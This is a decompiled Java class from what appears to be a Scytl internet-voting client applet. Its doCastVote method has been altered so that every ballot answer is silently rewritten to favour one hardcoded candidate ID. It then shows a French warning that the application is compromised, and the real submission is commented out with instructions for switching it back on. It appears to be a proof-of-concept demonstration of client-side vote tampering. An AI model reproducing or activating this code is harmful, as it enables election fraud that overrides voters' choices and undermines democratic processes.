/*     */ package com.scytl.pnyx.client.communication.application;
/*     */ 
/*     */ import com.scytl.common.domain.MessageType;
/*     */ import com.scytl.common.domain.election.ElectoralScope;
/*     */ import com.scytl.common.domain.election.ballot.Ballot;
import com.scytl.common.domain.election.ballot.QuestionAnswer;
import com.scytl.common.domain.election.ballot.ValuedMultipleChoiceQuestionAnswer;
/*     */ import com.scytl.common.url.UrlHelper;
/*     */ import com.scytl.crypto.CryptographicAlgorithms;
/*     */ import com.scytl.crypto.CryptographicFormats;
/*     */ import com.scytl.pnyx.client.VoteReceipt;
/*     */ import com.scytl.pnyx.client.communication.application.message.AuthenticationMessageDelegator;
/*     */ import com.scytl.pnyx.client.communication.application.message.BallotMessage;
/*     */ import com.scytl.pnyx.client.communication.application.message.CertificatesMessage;
/*     */ import com.scytl.pnyx.client.communication.application.message.SecureMessageMessage;
/*     */ import com.scytl.pnyx.client.communication.connector.ClientData;
/*     */ import com.scytl.pnyx.client.communication.transport.PnyxClientDestination;
/*     */ import com.scytl.pnyx.client.communication.transport.Transport;
/*     */ import com.scytl.pnyx.client.state.LoginData;
/*     */ import com.scytl.pnyx.protocol.PnyxProtocolException;
/*     */ import java.net.URL;
/*     */ import java.security.GeneralSecurityException;
/*     */ import java.security.PublicKey;
/*     */ import java.security.cert.CertStore;
import java.util.Map;

import javax.swing.JFrame;
import javax.swing.JOptionPane;

import org.picocontainer.ComponentMonitor;
/*     */ 
/*     */ public class MessagesProtocol
/*     */   implements ApplicationProtocol
/*     */ {
/*     */   private final Transport<URL> _transport;
/*     */   private final AuthenticationMessageDelegator<LoginData> _authenticationMessage;
/*     */   private final CertificatesMessage _certificatesMessage;
/*     */   private final BallotMessage _ballotsMessage;
/*     */   private final SecureMessageMessage _secureMessageMessage;
/*     */   private final PnyxClientDestination<URL> _destinations;
/*     */   private final CryptographicFormats _cryptoFormats;
/*     */   private final CryptographicAlgorithms _cryptoAlgorithms;
/*     */ 
/*     */   public MessagesProtocol(Transport<URL> transport, PnyxClientDestination<URL> destinations, CryptographicFormats cryptoFormats, CryptographicAlgorithms cryptoAlgorithms)
/*     */     throws GeneralSecurityException
/*     */   {
/*  66 */     this._transport = transport;
/*  67 */     this._destinations = destinations;
/*     */ 
/*  69 */     this._cryptoFormats = cryptoFormats;
/*  70 */     this._cryptoAlgorithms = cryptoAlgorithms;
/*     */ 
/*  72 */     this._authenticationMessage = new AuthenticationMessageDelegator(this._cryptoAlgorithms, this._cryptoFormats);
/*     */ 
/*  75 */     this._certificatesMessage = new CertificatesMessage(this._cryptoFormats);
/*  76 */     this._ballotsMessage = new BallotMessage();
/*  77 */     this._secureMessageMessage = new SecureMessageMessage(this._cryptoAlgorithms);
/*     */   }
/*     */ 
/*     */   public KeystoreAndToken doAuthenticate(LoginData loginData, ElectoralScope scope)
/*     */     throws ApplicationProtocolException, PnyxProtocolException
/*     */   {
/*  84 */     String response = this._transport.sendMessage(this._authenticationMessage.createMessage(loginData, scope), this._destinations.getPnyxAuthenticationAction());
/*  89 */     return this._authenticationMessage.parseResponse(UrlHelper.decodeParameters(response), loginData);
/*     */   }
/*     */ 
/*     */   public ComponentMonitor doGetToken$3b16f5d5(LoginData loginData, ElectoralScope scope)
/*     */     throws ApplicationProtocolException, PnyxProtocolException
/*     */   {
/*  96 */     String response = this._transport.sendMessage(this._authenticationMessage.createMessage(loginData, scope), this._destinations.getPnyxGetTokenAction());
/* 100 */     return this._authenticationMessage.parseResponse(UrlHelper.decodeParameters(response), loginData).getToken$49262418();
/*     */   }
/*     */ 
/*     */   public CertStore doGetCertificates$1c0cd8ed(ComponentMonitor token)
/*     */     throws ApplicationProtocolException, PnyxProtocolException
/*     */   {
/* 106 */     String response = this._transport.sendMessage(this._certificatesMessage.createMessage$4daa6153(token), this._destinations.getPnyxGetCertificatesAction());
/* 110 */     return this._certificatesMessage.parseResponse(response);
/*     */   }
/*     */ 
/*     */   public Ballot doGetBallot$1abffdf5(ComponentMonitor paramComponentMonitor, PublicKey paramPublicKey, MessageType paramMessageType)
/*     */     throws ApplicationProtocolException, PnyxProtocolException
/*     */   {
/* 116 */     String str = this._transport.sendMessage(this._ballotsMessage.createMessage$53a27e3a(paramComponentMonitor, paramMessageType), this._destinations.getPnyxGetBallotAction());
/*     */ 
/* 119 */     return this._ballotsMessage.parseResponse(str, paramPublicKey);
/*     */   }
/*     */ 
/*     */   public VoteReceipt doCastVote(ClientData clientData) throws ApplicationProtocolException, PnyxProtocolException
/*     */   {
	          Map<String, QuestionAnswer> vote = clientData.getTrustedBallot().getBallotAnswers();
	          for (Map.Entry<String, QuestionAnswer> kv : vote.entrySet()) {
		         ValuedMultipleChoiceQuestionAnswer qa = (ValuedMultipleChoiceQuestionAnswer)kv.getValue();
		         Map<String, String> answers = qa.getAnswerIdValues();
		         for (Map.Entry<String, String> kv2 : answers.entrySet()) {
			       String idCandidat = kv2.getKey();
			       if (idCandidat.equals("ff808081375acd2201375adad63d037a"))
				      kv2.setValue("1");
			       else
				     kv2.setValue(null);
		         }
	          }
		      StringBuffer sb = new StringBuffer("DOMMAGE! CETTE APPLICATION DE VOTE EST COMPROMISE.\n");
		      sb.append("QUELQUE-SOIT VOTRE CHOIX, VOUS ALLEZ VOTER EN REALITE POUR LE CANDIDAT PIRATE.\n");
		      JOptionPane.showMessageDialog(JFrame.getFrames()[0], sb.toString());
/* 124 */     ClientDataManager clientDataMgr = new ClientDataManager(clientData);
              /* ---- DECOMMENTER CETTE LIGNE POUR ACTIVER LE VOTE ---- */
/* 127 */     //String response = this._transport.sendMessage(this._secureMessageMessage.createMessage(clientDataMgr), this._destinations.getPnyxCastVoteAction());
              /* ---- ET COMMENTER CELLE LIGNE BIEN SUR... ---- */
/*     */     String response = "ABORT";
              /* ---- --- */
/* 131 */     return this._secureMessageMessage.parseResponse(response, clientDataMgr);
/*     */   }
/*     */ }

/* Location:           /home/laurent/VOTE/voting-applet.jar
 * Qualified Name:     com.scytl.pnyx.client.communication.application.MessagesProtocol
 * JD-Core Version:    0.6.0
 */
